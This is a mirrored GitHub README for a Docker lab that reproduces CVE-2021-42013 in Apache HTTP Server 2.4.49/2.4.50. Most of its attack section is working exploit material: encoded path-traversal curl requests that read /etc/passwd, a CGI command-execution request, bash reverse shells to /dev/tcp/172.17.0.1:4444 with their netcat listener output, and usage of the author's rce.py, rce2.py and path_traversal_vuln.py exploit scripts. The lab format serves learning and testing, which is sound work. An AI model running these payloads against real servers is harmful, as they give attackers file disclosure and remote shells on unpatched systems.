Giter Club home page Giter Club logo

cve-2021-42013-docker-lab's Introduction

CVE-2021-42013

Introduction

It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions [1].

Docker container lab to play/learn with CVE-2021-42013

  1. File disclosure vulnerability configuration:
$ docker build -t apache-default default_conf
$ docker run -dit --name apache-app -p 81:80 apache-default
  • Proof of Concept:
$ curl -s --path-as-is "http://172.17.0.2:80/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
  • using path_traversal_vuln.py
$ python3 path_traversal_vuln.py -h                                                                         

    >> CVE-2021-42013 - Path Traversal
    >> by twseptian

usage: path_traversal_vuln.py [-h] -t URL -p TARGET_PORT -x PAYLOAD -f FILE_READ

CVE-2021-42013 - Path Traversal

optional arguments:
  -h, --help            show this help message and exit
  -t URL, --target URL  Target IP
  -p TARGET_PORT, --port TARGET_PORT
                        Target port
  -x PAYLOAD, --execute PAYLOAD
                        Path Traversal Payload
  -f FILE_READ, --file FILE_READ
                        File to read
$ python3 path_traversal_vuln.py -t 172.17.0.2 -p 80 -x '.%%32%65/.%%32%65/.%%32%65/.%%32%65' -f /etc/passwd

Path traversal

  1. Remote Code Execution (CGI enabled) configuration:
$ docker build -t apache-cgi cgi_mod_enable
$ docker run -dit --name apache-lab -p 82:80 apache-cgi
  • Proof of Concept:
$ curl -s --path-as-is -d "echo Content-Type: text/plain; echo; id" "http://172.17.0.3:80/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh"
uid=1(daemon) gid=1(daemon) groups=1(daemon)
  • PoC using bash reverse shell
$ curl -s --path-as-is -d "echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/172.17.0.1/4444 0>&1" "http://172.17.0.3:80/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash"
  • netcat output
$ nc -lvnp 4444                                                            
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.17.0.3.
Ncat: Connection from 172.17.0.3:35660.
daemon@dcbbed945af7:/bin$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@dcbbed945af7:/bin$

-using rce.py

$ python3 rce.py -h

    >> CVE-2021-42013 - Remote Code Execution
    >> by twseptian

usage: rce.py [-h] -t URL -p TARGET_PORT -x PAYLOAD -s SHELL

CVE-2021-42013 - Path Traversal

optional arguments:
  -h, --help            show this help message and exit
  -t URL, --target URL  Target IP
  -p TARGET_PORT, --port TARGET_PORT
                        Target port
  -x PAYLOAD, --execute PAYLOAD
                        Path Traversal Payload
  -s SHELL, --shell SHELL
                        shell
$ python3 rce.py -t 172.17.0.3 -p 80 -x '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65' -s "/bin/bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'"
  • netcat listener
$ nc -lvnp 4444                                                    
listening on [any] 4444 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.3] 41052
daemon@82f07f4b32a8:/bin$

using rce.py

  • using rce2.py
$ python3 rce2.py -h

    >> CVE-2021-42013 - Remote Code Execution
    >> by twseptian

usage: rce2.py [-h] -t URL -p TARGET_PORT -L LOCALHOST -P LOCALPORT -x PAYLOAD

CVE-2021-42013 - Path Traversal

optional arguments:
  -h, --help            show this help message and exit
  -t URL, --target URL  Target IP
  -p TARGET_PORT, --port TARGET_PORT
                        Target port
  -L LOCALHOST, --lh LOCALHOST
                        Localhost/Local IP
  -P LOCALPORT, --lp LOCALPORT
                        Localport
  -x PAYLOAD, --execute PAYLOAD
                        Path Traversal Payload
$ python3 rce2.py -t 172.17.0.3 -p 80 -L 172.17.0.1 -P 4444 -x '.%%32%65/.%%32%65/.%%32%65/.%%32%65'

    >> CVE-2021-42013 - Remote Code Execution
    >> by twseptian

[!] Payload: .%%32%65/.%%32%65/.%%32%65/.%%32%65
[*] Setting up a netcat listener
listening on [any] 4444 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.3] 41122
bash: initialize_job_control: no job control in background: Bad file descriptor
daemon@82f07f4b32a8:/bin$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@82f07f4b32a8:/bin$

using rce.py

References

cve-2021-42013-docker-lab's People

Contributors

twseptian avatar

Watchers

layzhi avatar avatar

Forkers

layzhi

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.